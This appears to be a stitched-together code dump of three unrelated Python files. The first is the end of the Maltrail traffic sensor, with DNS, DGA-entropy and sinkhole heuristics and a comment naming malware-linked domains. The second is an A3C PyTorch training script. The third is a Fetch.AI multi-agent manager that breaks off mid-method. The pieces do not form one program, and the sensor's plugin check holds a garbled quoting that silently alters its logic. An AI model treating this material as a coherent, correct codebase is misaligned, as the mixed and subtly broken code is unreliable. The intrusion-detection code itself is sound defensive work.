log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "%s (suspicious)" % desc, "(heuristic)"), packet)
break
elif protocol == socket.IPPROTO_UDP: # UDP
_ = ip_data[iph_length:iph_length + 4]
if len(_) < 4:
return
src_port, dst_port = struct.unpack("!HH", _)
_ = _last_udp
_last_udp = (sec, src_ip, src_port, dst_ip, dst_port)
if _ == _last_udp: # skip bursts
return
if src_port != 53 and dst_port != 53: # not DNS
if dst_ip in trails:
trail = dst_ip
elif src_ip in trails:
trail = src_ip
else:
trail = None
if trail:
_ = _last_logged_udp
_last_logged_udp = _last_udp
if _ != _last_logged_udp:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, trail, trails[trail][0], trails[trail][1]), packet)
else:
dns_data = ip_data[iph_length + 8:]
# Reference: http://www.ccs.neu.edu/home/amislove/teaching/cs4700/fall09/handouts/project1-primer.pdf
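                # DNS names are encoded as length-prefixed labels, e.g.
                # "\x03www\x07example\x03com\x00" -> "www.example.com"; the loop below walks those labels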
if len(dns_data) > 6:
qdcount = struct.unpack("!H", dns_data[4:6])[0]
if qdcount > 0:
offset = 12
query = ""
while len(dns_data) > offset:
length = ord(dns_data[offset])
if not length:
query = query[:-1]
break
query += dns_data[offset + 1:offset + length + 1] + '.'
offset += length + 1
query = query.lower()
if not query or '.' not in query or not all(_ in VALID_DNS_CHARS for _ in query) or any(_ in query for _ in (".intranet.",)) or query.split('.')[-1] in IGNORE_DNS_QUERY_SUFFIXES:
return
parts = query.split('.')
if ord(dns_data[2]) & 0xfe == 0x00: # standard query (both recursive and non-recursive)
type_, class_ = struct.unpack("!HH", dns_data[offset + 1:offset + 5])
if len(parts) > 2:
if len(parts) > 3 and len(parts[-2]) <= 3:
domain = '.'.join(parts[-3:])
else:
domain = '.'.join(parts[-2:])
if not _check_domain_whitelisted(domain): # e.g. <hash>.hashserver.cs.trendmicro.com
if (sec - (_subdomains_sec or 0)) > DAILY_SECS:
_subdomains.clear()
_dns_exhausted_domains.clear()
_subdomains_sec = sec
subdomains = _subdomains.get(domain)
if not subdomains:
subdomains = _subdomains[domain] = set()
if not re.search(r"\A\d+\-\d+\-\d+\-\d+\Z", parts[0]):
if len(subdomains) < DNS_EXHAUSTION_THRESHOLD:
subdomains.add('.'.join(parts[:-2]))
else:
if (sec - (_last_dns_exhaustion or 0)) > 60:
trail = "(%s).%s" % ('.'.join(parts[:-2]), '.'.join(parts[-2:]))
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "potential dns exhaustion (suspicious)", "(heuristic)"), packet)
_dns_exhausted_domains.add(domain)
_last_dns_exhaustion = sec
return
# Reference: http://en.wikipedia.org/wiki/List_of_DNS_record_types
if type_ not in (12, 28) and class_ == 1: # Type not in (PTR, AAAA), Class IN
if "%s:%s" % (dst_ip, dst_port) in trails:
trail = "%s:%s" % (dst_ip, dst_port)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IPORT, "%s (%s)" % (dst_ip, query), trails[trail][0], trails[trail][1]), packet)
elif dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, "%s (%s)" % (dst_ip, query), trails[dst_ip][0], trails[dst_ip][1]), packet)
elif src_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet)
_check_domain(query, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, packet)
elif config.USE_HEURISTICS:
if ord(dns_data[2]) & 0x80: # standard response
if ord(dns_data[3]) == 0x80: # recursion available, no error
_ = offset + 5
try:
while _ < len(dns_data):
if ord(dns_data[_]) & 0xc0 != 0 and dns_data[_ + 2] == "\00" and dns_data[_ + 3] == "\x01": # Type A
break
else:
_ += 12 + struct.unpack("!H", dns_data[_ + 10: _ + 12])[0]
_ = dns_data[_ + 12:_ + 16]
if _:
answer = socket.inet_ntoa(_)
if answer in trails:
_ = trails[answer]
if "sinkhole" in _[0]:
trail = "(%s).%s" % ('.'.join(parts[:-1]), '.'.join(parts[-1:]))
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "sinkholed by %s (malware)" % _[0].split(" ")[1], "(heuristic)"), packet) # (e.g. kitro.pl, devomchart.com, jebena.ananikolic.su, vuvet.cn)
elif "parking" in _[0]:
trail = "(%s).%s" % ('.'.join(parts[:-1]), '.'.join(parts[-1:]))
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "parked site (suspicious)", "(heuristic)"), packet)
except IndexError:
pass
elif ord(dns_data[3]) == 0x83: # recursion available, no such name
if '.'.join(parts[-2:]) not in _dns_exhausted_domains and not _check_domain_whitelisted(query) and not _check_domain_member(query, trails):
if parts[-1].isdigit():
return
if not (len(parts) > 4 and all(_.isdigit() and int(_) < 256 for _ in parts[:4])): # generic check for DNSBL IP lookups
for _ in filter(None, (query, "*.%s" % '.'.join(parts[-2:]) if query.count('.') > 1 else None)):
if _ not in NO_SUCH_NAME_COUNTERS or NO_SUCH_NAME_COUNTERS[_][0] != sec / 3600:
NO_SUCH_NAME_COUNTERS[_] = [sec / 3600, 1, set()]
else:
NO_SUCH_NAME_COUNTERS[_][1] += 1
NO_SUCH_NAME_COUNTERS[_][2].add(query)
if NO_SUCH_NAME_COUNTERS[_][1] > NO_SUCH_NAME_PER_HOUR_THRESHOLD:
if _.startswith("*."):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, "%s%s" % ("(%s)" % ','.join(item.replace(_[1:], "") for item in NO_SUCH_NAME_COUNTERS[_][2]), _[1:]), "excessive no such domain (suspicious)", "(heuristic)"), packet)
for item in NO_SUCH_NAME_COUNTERS[_][2]:
try:
del NO_SUCH_NAME_COUNTERS[item]
except KeyError:
pass
else:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, _, "excessive no such domain (suspicious)", "(heuristic)"), packet)
try:
del NO_SUCH_NAME_COUNTERS[_]
except KeyError:
pass
break
if len(parts) > 2:
part = parts[0] if parts[0] != "www" else parts[1]
trail = "(%s).%s" % ('.'.join(parts[:-2]), '.'.join(parts[-2:]))
elif len(parts) == 2:
part = parts[0]
trail = "(%s).%s" % (parts[0], parts[1])
else:
part = query
trail = query
if part and '-' not in part:
result = _result_cache.get(part)
if result is None:
# Reference: https://github.com/exp0se/dga_detector
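                                                # Shannon entropy H = -sum(p * log2(p)) over the label's characters,
                                                # e.g. "aaaa" -> 0.0 bits, "abcd" -> 2.0 bits, so random-looking DGA labels score high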
probabilities = (float(part.count(c)) / len(part) for c in set(_ for _ in part))
entropy = -sum(p * math.log(p) / math.log(2.0) for p in probabilities)
if entropy > SUSPICIOUS_DOMAIN_ENTROPY_THRESHOLD:
result = "entropy threshold no such domain (suspicious)"
if not result:
if sum(_ in CONSONANTS for _ in part) > SUSPICIOUS_DOMAIN_CONSONANT_THRESHOLD:
result = "consonant threshold no such domain (suspicious)"
_result_cache[part] = result or False
if result:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, result, "(heuristic)"), packet)
elif protocol in IPPROTO_LUT: # non-TCP/UDP (e.g. ICMP)
if protocol == socket.IPPROTO_ICMP:
if ord(ip_data[iph_length]) != 0x08: # Non-echo request
return
elif protocol == socket.IPPROTO_ICMPV6:
if ord(ip_data[iph_length]) != 0x80: # Non-echo request
return
if dst_ip in trails:
log_event((sec, usec, src_ip, '-', dst_ip, '-', IPPROTO_LUT[protocol], TRAIL.IP, dst_ip, trails[dst_ip][0], trails[dst_ip][1]), packet)
elif src_ip in trails:
log_event((sec, usec, src_ip, '-', dst_ip, '-', IPPROTO_LUT[protocol], TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet)
except struct.error:
pass
except Exception:
if config.SHOW_DEBUG:
traceback.print_exc()
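# Illustrative sketch (not part of the original sensor) of the Shannon-entropy
# heuristic applied above to "no such name" responses: high-entropy labels are
# typical of algorithmically generated (DGA) domains. A standalone version of
# the same calculation (reusing the already imported 'math' module):
#
#   def _label_entropy(label):
#       probabilities = (float(label.count(c)) / len(label) for c in set(label))
#       return -sum(p * math.log(p) / math.log(2.0) for p in probabilities)
#
#   _label_entropy("google")      # low entropy, dictionary-like label
#   _label_entropy("xk2qzjw9pv")  # higher entropy, DGA-like label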
def init():
"""
Performs sensor initialization
"""
global _multiprocessing
try:
import multiprocessing
if config.PROCESS_COUNT > 1:
_multiprocessing = multiprocessing
except (ImportError, OSError, NotImplementedError):
pass
def update_timer():
retries = 0
if not config.no_updates:
while retries < CHECK_CONNECTION_MAX_RETRIES and not check_connection():
sys.stdout.write("[!] can't update because of lack of Internet connection (waiting..." if not retries else '.')
sys.stdout.flush()
time.sleep(10)
retries += 1
if retries:
print(")")
if config.no_updates or retries == CHECK_CONNECTION_MAX_RETRIES:
if retries == CHECK_CONNECTION_MAX_RETRIES:
print("[x] going to continue without online update")
_ = update_trails(offline=True)
else:
_ = update_trails()
update_ipcat()
if _:
trails.clear()
trails.update(_)
elif not trails:
_ = load_trails()
trails.update(_)
_regex = ""
for trail in trails:
if re.search(r"[\].][*+]|\[[a-z0-9_.\-]+\]", trail, re.I):
try:
re.compile(trail)
except:
pass
else:
if re.escape(trail) != trail:
_regex += "|(?P<g%s>%s)" % (_regex.count("(?P<g"), trail)
trails._regex = _regex.strip('|')
thread = threading.Timer(config.UPDATE_PERIOD, update_timer)
thread.daemon = True
thread.start()
create_log_directory()
get_error_log_handle()
check_memory()
msg = "[i] using '%s' for trail storage" % config.TRAILS_FILE
if os.path.isfile(config.TRAILS_FILE):
mtime = time.gmtime(os.path.getmtime(config.TRAILS_FILE))
msg += " (last modification: '%s')" % time.strftime(HTTP_TIME_FORMAT, mtime)
print(msg)
update_timer()
if not config.DISABLE_CHECK_SUDO and check_sudo() is False:
exit("[!] please run '%s' with sudo/Administrator privileges" % __file__)
if config.plugins:
config.plugin_functions = []
for plugin in re.split(r"[,;]", config.plugins):
plugin = plugin.strip()
found = False
for _ in (plugin, os.path.join("plugins", plugin), os.path.join("plugins", "%s.py" % plugin)):
if os.path.isfile(_):
plugin = _
found = True
break
if not found:
exit("[!] plugin script '%s' not found" % plugin)
else:
dirname, filename = os.path.split(plugin)
dirname = os.path.abspath(dirname)
if not os.path.exists(os.path.join(dirname, '__init__.py')):
exit("[!] empty file '__init__.py' required inside directory '%s'" % dirname)
if not filename.endswith(".py"):
exit("[!] plugin script '%s' should have an extension '.py'" % filename)
if dirname not in sys.path:
sys.path.insert(0, dirname)
try:
module = __import__(filename[:-3].encode(sys.getfilesystemencoding()))
except (ImportError, SyntaxError) as msg:
exit("[!] unable to import plugin script '%s' (%s)" % (filename, msg))
found = False
for name, function in inspect.getmembers(module, inspect.isfunction):
if name == "plugin" and not set(inspect.getargspec(function).args) & set(("event_tuple', 'packet")):
found = True
config.plugin_functions.append(function)
function.func_name = module.__name__
if not found:
exit("[!] missing function 'plugin(event_tuple, packet)' in plugin script '%s'" % filename)
if config.pcap_file:
for _ in config.pcap_file.split(','):
_caps.append(pcapy.open_offline(_))
else:
interfaces = set(_.strip() for _ in config.MONITOR_INTERFACE.split(','))
if (config.MONITOR_INTERFACE or "").lower() == "any":
if subprocess.mswindows or "any" not in pcapy.findalldevs():
print("[x] virtual interface 'any' missing. Replacing it with all interface names")
interfaces = pcapy.findalldevs()
else:
print("[?] in case of any problems with packet capture on virtual interface 'any', please put all monitoring interfaces to promiscuous mode manually (e.g. 'sudo ifconfig eth0 promisc')")
for interface in interfaces:
if interface.lower() != "any" and interface not in pcapy.findalldevs():
hint = "[?] available interfaces: '%s'" % ",".join(pcapy.findalldevs())
exit("[!] interface '%s' not found\n%s" % (interface, hint))
print("[i] opening interface '%s'" % interface)
try:
_caps.append(pcapy.open_live(interface, SNAP_LEN, True, CAPTURE_TIMEOUT))
except (socket.error, pcapy.PcapError):
if "permitted" in str(sys.exc_info()[1]):
exit("[!] permission problem occurred ('%s')" % sys.exc_info()[1])
elif "No such device" in str(sys.exc_info()[1]):
exit("[!] no such device '%s'" % interface)
else:
raise
if config.LOG_SERVER and ':' not in config.LOG_SERVER:
exit("[!] invalid configuration value for 'LOG_SERVER' ('%s')" % config.LOG_SERVER)
if config.SYSLOG_SERVER and not len(config.SYSLOG_SERVER.split(':')) == 2:
exit("[!] invalid configuration value for 'SYSLOG_SERVER' ('%s')" % config.SYSLOG_SERVER)
if config.CAPTURE_FILTER:
print("[i] setting capture filter '%s'" % config.CAPTURE_FILTER)
for _cap in _caps:
try:
_cap.setfilter(config.CAPTURE_FILTER)
except:
pass
if _multiprocessing:
_init_multiprocessing()
if not subprocess.mswindows and not config.DISABLE_CPU_AFFINITY:
try:
try:
mod = int(subprocess.check_output("grep -c ^processor /proc/cpuinfo", stderr=subprocess.STDOUT, shell=True).strip())
used = subprocess.check_output("for pid in $(ps aux | grep python | grep sensor.py | grep -E -o 'root[ ]*[0-9]*' | tr -d '[:alpha:] '); do schedtool $pid; done | grep -E -o 'AFFINITY .*' | cut -d ' ' -f 2 | grep -v 0xf", stderr=subprocess.STDOUT, shell=True).strip().split('\n')
max_used = max(int(_, 16) for _ in used)
affinity = max(1, (max_used << 1) % 2 ** mod)
except:
affinity = 1
p = subprocess.Popen("schedtool -n -2 -M 2 -p 10 -a 0x%02x %d" % (affinity, os.getpid()), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
_, stderr = p.communicate()
if "not found" in stderr:
msg, _ = "[?] please install 'schedtool' for better CPU scheduling", platform.linux_distribution()[0].lower()
for distro, install in {("fedora", "centos"): "sudo yum install schedtool", ("debian", "ubuntu"): "sudo apt-get install schedtool"}.items():
if _ in distro:
msg += " (e.g. '%s')" % install
break
print(msg)
except:
pass
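# Illustrative sketch of a plugin file accepted by the loader above (the file
# name and body are hypothetical; only the required 'plugin(event_tuple, packet)'
# signature and the event tuple layout come from this script):
#
#   # plugins/print_events.py
#   def plugin(event_tuple, packet):
#       sec, usec, src_ip, src_port, dst_ip, dst_port, proto, trail_type, trail, info, reference = event_tuple
#       print("%s:%s -> %s:%s %s (%s)" % (src_ip, src_port, dst_ip, dst_port, trail, info))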
def _init_multiprocessing():
"""
Inits worker processes used in multiprocessing mode
"""
global _buffer
global _n
if _multiprocessing:
print("[i] preparing capture buffer...")
try:
_buffer = mmap.mmap(-1, config.CAPTURE_BUFFER) # http://www.alexonlinux.com/direct-io-in-python
_ = "\x00" * MMAP_ZFILL_CHUNK_LENGTH
for i in xrange(config.CAPTURE_BUFFER / MMAP_ZFILL_CHUNK_LENGTH):
_buffer.write(_)
_buffer.seek(0)
except KeyboardInterrupt:
raise
except:
exit("[!] unable to allocate network capture buffer. Please adjust value of 'CAPTURE_BUFFER'")
print("[i] creating %d more processes (out of total %d)" % (config.PROCESS_COUNT - 1, config.PROCESS_COUNT))
_n = _multiprocessing.Value('L', lock=False)
for i in xrange(config.PROCESS_COUNT - 1):
process = _multiprocessing.Process(target=worker, name=str(i), args=(_buffer, _n, i, config.PROCESS_COUNT - 1, _process_packet))
process.daemon = True
process.start()
def monitor():
"""
Sniffs/monitors given capturing interface
"""
print("[o] running...")
def packet_handler(datalink, header, packet):
global _count
ip_offset = None
try:
dlt_offset = DLT_OFFSETS[datalink]
except KeyError:
log_error("Received unexpected datalink (%d)" % datalink)
return
try:
if datalink == pcapy.DLT_RAW:
ip_offset = dlt_offset
elif datalink == pcapy.DLT_PPP:
if packet[2:4] in ("\x00\x21", "\x00\x57"): # (IPv4, IPv6)
ip_offset = dlt_offset
elif dlt_offset >= 2:
if packet[dlt_offset - 2:dlt_offset] == "\x81\x00": # VLAN
dlt_offset += 4
if packet[dlt_offset - 2:dlt_offset] in ("\x08\x00", "\x86\xdd"): # (IPv4, IPv6)
ip_offset = dlt_offset
except IndexError:
pass
if ip_offset is None:
return
try:
sec, usec = header.getts()
if _multiprocessing:
if _locks.count:
_locks.count.acquire()
write_block(_buffer, _count, struct.pack("=III", sec, usec, ip_offset) + packet)
_n.value = _count = _count + 1
if _locks.count:
_locks.count.release()
else:
_process_packet(packet, sec, usec, ip_offset)
except socket.timeout:
pass
try:
def _(_cap):
global _done_count
datalink = _cap.datalink()
while True:
success = False
try:
(header, packet) = _cap.next()
if header is not None:
success = True
packet_handler(datalink, header, packet)
elif config.pcap_file:
with _done_lock:
_done_count += 1
break
except (pcapy.PcapError, socket.timeout):
pass
if not success:
time.sleep(REGULAR_SENSOR_SLEEP_TIME)
if len(_caps) > 1:
if _multiprocessing:
_locks.count = threading.Lock()
_locks.connect_sec = threading.Lock()
for _cap in _caps:
threading.Thread(target=_, args=(_cap,)).start()
while _caps and not _done_count == (config.pcap_file or "").count(',') + 1:
time.sleep(1)
print("[i] all capturing interfaces closed")
except SystemError as ex:
if "error return without" in str(ex):
print("\r[x] stopping (Ctrl-C pressed)")
else:
raise
except KeyboardInterrupt:
print("\r[x] stopping (Ctrl-C pressed)")
finally:
print("\r[i] please wait...")
if _multiprocessing:
try:
for _ in xrange(config.PROCESS_COUNT - 1):
write_block(_buffer, _n.value, "", BLOCK_MARKER.END)
_n.value = _n.value + 1
while _multiprocessing.active_children():
time.sleep(REGULAR_SENSOR_SLEEP_TIME)
except KeyboardInterrupt:
pass
def main():
print("%s (sensor) #v%s\n" % (NAME, VERSION))
for i in xrange(1, len(sys.argv)):
if sys.argv[i] == "-i":
for j in xrange(i + 2, len(sys.argv)):
value = sys.argv[j]
if os.path.isfile(value):
sys.argv[i + 1] += ",%s" % value
sys.argv[j] = ''
else:
break
parser = optparse.OptionParser(version=VERSION)
parser.add_option("-c", dest="config_file", default=CONFIG_FILE, help="configuration file (default: '%s')" % os.path.split(CONFIG_FILE)[-1])
parser.add_option("-i", dest="pcap_file", help="open pcap file for offline analysis")
parser.add_option("-p", dest="plugins", help="plugin(s) to be used per event")
parser.add_option("--console", dest="console", action="store_true", help="print events to console (too)")
parser.add_option("--no-updates", dest="no_updates", action="store_true", help="disable (online) trail updates")
parser.add_option("--debug", dest="debug", action="store_true", help=optparse.SUPPRESS_HELP)
options, _ = parser.parse_args()
read_config(options.config_file)
for option in dir(options):
if isinstance(getattr(options, option), (basestring, bool)) and not option.startswith('_'):
config[option] = getattr(options, option)
if options.debug:
config.console = True
config.PROCESS_COUNT = 1
config.SHOW_DEBUG = True
if options.pcap_file:
if options.pcap_file == '-':
print("[i] using STDIN")
else:
for _ in options.pcap_file.split(','):
if not os.path.isfile(_):
exit("[!] missing pcap file '%s'" % _)
print("[i] using pcap file(s) '%s'" % options.pcap_file)
if not config.DISABLE_CHECK_SUDO and not check_sudo():
exit("[!] please run '%s' with sudo/Administrator privileges" % __file__)
try:
init()
monitor()
except KeyboardInterrupt:
print("\r[x] stopping (Ctrl-C pressed)")
if __name__ == "__main__":
show_final = True
try:
main()
except SystemExit as ex:
show_final = False
if isinstance(getattr(ex, "message"), basestring):
print(ex)
os._exit(1)
except IOError:
show_final = False
log_error("\n\n[!] session abruptly terminated\n[?] (hint: \"https://stackoverflow.com/a/20997655\")")
except Exception:
msg = "\r[!] unhandled exception occurred ('%s')" % sys.exc_info()[1]
msg += "\n[x] please report the following details at 'https://github.com/stamparm/maltrail/issues':\n---\n'%s'\n---" % traceback.format_exc()
log_error("\n\n%s" % msg.replace("\r", ""))
print(msg)
finally:
if show_final:
print("[i] finished")
os._exit(0)
|
main.py
|
from __future__ import print_function
import argparse
import os
import torch
import torch.multiprocessing as mp
import my_optim
from envs import create_atari_env
from model import ActorCritic
from test import test
from train import train
# Based on
# https://github.com/pytorch/examples/tree/master/mnist_hogwild
# Training settings
parser = argparse.ArgumentParser(description='A3C')
parser.add_argument('--lr', type=float, default=0.0001,
help='learning rate (default: 0.0001)')
parser.add_argument('--tt', type=float, default=10,
help='thread update freq (default: 10)')
parser.add_argument('--tg', type=float, default=10,
help='global update freq (default: 10)')
parser.add_argument('--epsilon', type=float, default=0.01,
help='epsilon action selection (default: 0.01)')
parser.add_argument('--gamma', type=float, default=0.99,
help='discount factor for rewards (default: 0.99)')
parser.add_argument('--gae-lambda', type=float, default=1.00,
help='lambda parameter for GAE (default: 1.00)')
parser.add_argument('--entropy-coef', type=float, default=0.01,
help='entropy term coefficient (default: 0.01)')
parser.add_argument('--value-loss-coef', type=float, default=0.5,
help='value loss coefficient (default: 0.5)')
parser.add_argument('--max-grad-norm', type=float, default=50,
help='max gradient norm (default: 50)')
parser.add_argument('--seed', type=int, default=1,
help='random seed (default: 1)')
parser.add_argument('--num-processes', type=int, default=4,
help='how many training processes to use (default: 4)')
parser.add_argument('--num-steps', type=int, default=4000,
help='number of forward steps in A3C (default: 4000)')
parser.add_argument('--max-episode-length', type=int, default=1000000,
help='maximum length of an episode (default: 1000000)')
parser.add_argument('--env-name', default='PongDeterministic-v4',
help='environment to train on (default: PongDeterministic-v4)')
parser.add_argument('--no-shared', default=False,
help='use an optimizer without shared momentum.')
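# Example invocation (illustrative; any of the flags defined above can be overridden):
#
#   python main.py --env-name PongDeterministic-v4 --num-processes 4 --lr 0.0001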
if __name__ == '__main__':
os.environ['OMP_NUM_THREADS'] = '1'
os.environ['CUDA_VISIBLE_DEVICES'] = ""
args = parser.parse_args()
torch.manual_seed(args.seed)
env = create_atari_env(args.env_name)
shared_model = ActorCritic(
env.observation_space.shape[0], env.action_space)
shared_model.share_memory()
if args.no_shared:
optimizer = None
else:
optimizer = my_optim.SharedAdam(shared_model.parameters(), lr=args.lr)
optimizer.share_memory()
processes = []
counter = mp.Value('i', 0)
lock = mp.Lock()
# p = mp.Process(target=test, args=(args.num_processes, args, shared_model, counter))
# p.start()
# processes.append(p)
for rank in range(0, args.num_processes):
p = mp.Process(target=train, args=(rank, args, shared_model, counter, lock, optimizer))
p.start()
processes.append(p)
for p in processes:
p.join()
|
manager.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2020 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the implementation of AEA agents manager."""
import asyncio
import json
import os
import threading
from asyncio.tasks import FIRST_COMPLETED
from collections import defaultdict
from shutil import rmtree
from threading import Thread
from typing import Any, Callable, Dict, List, Optional, Set, Tuple
from aea.aea import AEA
from aea.configurations.constants import AEA_MANAGER_DATA_DIRNAME, DEFAULT_REGISTRY_NAME
from aea.configurations.data_types import PublicId
from aea.crypto.plugin import load_all_plugins
from aea.helpers.io import open_file
from aea.manager.project import AgentAlias, Project
class ProjectNotFoundError(ValueError):
"""Project not found exception."""
class ProjectCheckError(ValueError):
"""Project check error exception."""
def __init__(self, msg: str, source_exception: Exception):
"""Init exception."""
super().__init__(msg)
self.source_exception = source_exception
class AgentRunAsyncTask:
"""Async task wrapper for agent."""
def __init__(self, agent: AEA, loop: asyncio.AbstractEventLoop) -> None:
"""Init task with agent and loop."""
self.run_loop: asyncio.AbstractEventLoop = loop
self.caller_loop: asyncio.AbstractEventLoop = loop
self._done_future: Optional[asyncio.Future] = None
self.task: Optional[asyncio.Task] = None
self.agent = agent
def create_run_loop(self) -> None:
"""Create run loop."""
def start(self) -> None:
"""Start task."""
self.create_run_loop()
self.task = self.run_loop.create_task(self._run_wrapper())
self._done_future = asyncio.Future(loop=self.caller_loop)
def wait(self) -> asyncio.Future:
"""Return future to wait task completed."""
if not self._done_future: # pragma: nocover
raise ValueError("Task not started!")
return self._done_future
def stop(self) -> None:
"""Stop task."""
if not self.run_loop or not self.task: # pragma: nocover
raise ValueError("Task was not started!")
self.run_loop.call_soon_threadsafe(self.task.cancel)
async def _run_wrapper(self) -> None:
"""Run task internals."""
if not self._done_future: # pragma: nocover
raise ValueError("Task was not started! please use start method")
exc = None
try:
await self.run()
except asyncio.CancelledError: # pragma: nocover
pass
except Exception as e: # pylint: disable=broad-except
exc = e
finally:
self.caller_loop.call_soon_threadsafe(self._set_result, exc)
def _set_result(self, exc: Optional[BaseException]) -> None:
"""Set result of task execution."""
if not self._done_future or self._done_future.done(): # pragma: nocover
return
if exc:
self._done_future.set_exception(exc)
else:
self._done_future.set_result(None)
async def run(self) -> None:
"""Run task body."""
self.agent.runtime.set_loop(self.run_loop)
await self.agent.runtime.run()
@property
def is_running(self) -> bool:
"""Return is task running."""
return not self.wait().done()
class AgentRunThreadTask(AgentRunAsyncTask):
"""Threaded wrapper to run agent."""
def __init__(self, agent: AEA, loop: asyncio.AbstractEventLoop) -> None:
"""Init task with agent and loop."""
AgentRunAsyncTask.__init__(self, agent, loop)
self._thread: Optional[Thread] = None
def create_run_loop(self) -> None:
"""Create run loop."""
self.run_loop = asyncio.new_event_loop()
def start(self) -> None:
"""Run task in a dedicated thread."""
super().start()
self._thread = threading.Thread(
target=self.run_loop.run_until_complete, args=[self.task], daemon=True
)
self._thread.start()
def stop(self,) -> None:
"""Stop the task."""
super().stop()
if self._thread is not None:
self._thread.join()
class MultiAgentManager:
"""Multi agents manager."""
MODES = ["async", "threaded"]
DEFAULT_TIMEOUT_FOR_BLOCKING_OPERATIONS = 60
SAVE_FILENAME = "save.json"
def __init__(
self,
working_dir: str,
mode: str = "async",
registry_path: str = DEFAULT_REGISTRY_NAME,
auto_add_remove_project: bool = False,
password: Optional[str] = None,
) -> None:
"""
Initialize manager.
:param working_dir: directory to store base agents.
:param mode: str. async or threaded
:param registry_path: str. path to the local packages registry
:param auto_add_remove_project: bool. add/remove project on the first agent add/last agent remove
:param password: the password to encrypt/decrypt the private key.
:return: None
"""
self.working_dir = working_dir
self._auto_add_remove_project = auto_add_remove_project
self._save_path = os.path.join(self.working_dir, self.SAVE_FILENAME)
self.registry_path = registry_path
self._was_working_dir_created = False
self._is_running = False
self._projects: Dict[PublicId, Project] = {}
self._versionless_projects_set: Set[PublicId] = set()
self._data_dir = os.path.abspath(
os.path.join(self.working_dir, AEA_MANAGER_DATA_DIRNAME)
)
self._agents: Dict[str, AgentAlias] = {}
self._agents_tasks: Dict[str, AgentRunAsyncTask] = {}
self._thread: Optional[Thread] = None
self._loop: Optional[asyncio.AbstractEventLoop] = None
self._event: Optional[asyncio.Event] = None
self._error_callbacks: List[Callable[[str, BaseException], None]] = []
self._last_start_status: Optional[
Tuple[
bool,
Dict[PublicId, List[Dict]],
List[Tuple[PublicId, List[Dict], Exception]],
]
] = None
if mode not in self.MODES:
raise ValueError(
f'Invalid mode {mode}. Valid modes are {", ".join(self.MODES)}'
)
self._started_event = threading.Event()
self._mode = mode
self._password = password
@property
def data_dir(self) -> str:
"""Get the certs directory."""
return self._data_dir
def get_data_dir_of_agent(self, agent_name: str) -> str:
"""Get the data directory of a specific agent."""
return os.path.join(self.data_dir, agent_name)
@property
def is_running(self) -> bool:
"""Is manager running."""
return self._is_running
@property
def dict_state(self) -> Dict[str, Any]:
"""Create MultiAgentManager dist state."""
return {
"projects": [str(public_id) for public_id in self._projects.keys()],
"agents": [alias.dict for alias in self._agents.values()],
}
@property
def projects(self) -> Dict[PublicId, Project]:
"""Get all projects."""
return self._projects
def _run_thread(self) -> None:
"""Run internal thread with own event loop."""
self._loop = asyncio.new_event_loop()
self._event = asyncio.Event(loop=self._loop)
self._loop.run_until_complete(self._manager_loop())
async def _manager_loop(self) -> None:
"""Await and control running manager."""
if not self._event: # pragma: nocover
raise ValueError("Do not use this method directly, use start_manager.")
self._started_event.set()
while self._is_running:
agents_run_tasks_futures = {
task.wait(): agent_name
for agent_name, task in self._agents_tasks.items()
}
wait_tasks = list(agents_run_tasks_futures.keys()) + [self._event.wait()] # type: ignore
done, _ = await asyncio.wait(wait_tasks, return_when=FIRST_COMPLETED)
if self._event.is_set():
self._event.clear()
for task in done:
if task not in agents_run_tasks_futures:
# task not in agents_run_tasks_futures, so it's event_wait, skip it
await task
continue
agent_name = agents_run_tasks_futures[task]
self._agents_tasks.pop(agent_name)
if task.exception():
for callback in self._error_callbacks:
callback(agent_name, task.exception())
else:
await task
def add_error_callback(
self, error_callback: Callable[[str, BaseException], None]
) -> None:
"""Add error callback to call on error raised."""
self._error_callbacks.append(error_callback)
def start_manager(
self, local: bool = False, remote: bool = False
) -> "MultiAgentManager":
"""
Start manager.
If local = False and remote = False, then the packages
are fetched in mixed mode (i.e. first try from local
registry, and then from remote registry in case of failure).
:param local: whether or not to fetch from local registry.
:param remote: whether or not to fetch from remote registry.
:return: the MultiAgentManager instance.
"""
if self._is_running:
return self
self._ensure_working_dir()
self._last_start_status = self._load_state(local=local, remote=remote)
self._started_event.clear()
self._is_running = True
self._thread = Thread(target=self._run_thread, daemon=True)
self._thread.start()
self._started_event.wait(self.DEFAULT_TIMEOUT_FOR_BLOCKING_OPERATIONS)
return self
@property
def last_start_status(
self,
) -> Tuple[
bool, Dict[PublicId, List[Dict]], List[Tuple[PublicId, List[Dict], Exception]],
]:
"""Get status of the last agents start loading state."""
if self._last_start_status is None:
raise ValueError("Manager was not started")
return self._last_start_status
def stop_manager(
self, cleanup: bool = True, save: bool = False
) -> "MultiAgentManager":
"""
Stop manager.
Stops all running agents and then the manager itself.
:param cleanup: bool is cleanup on stop.
:param save: bool is save state to file on stop.
:return: None
"""
if not self._is_running:
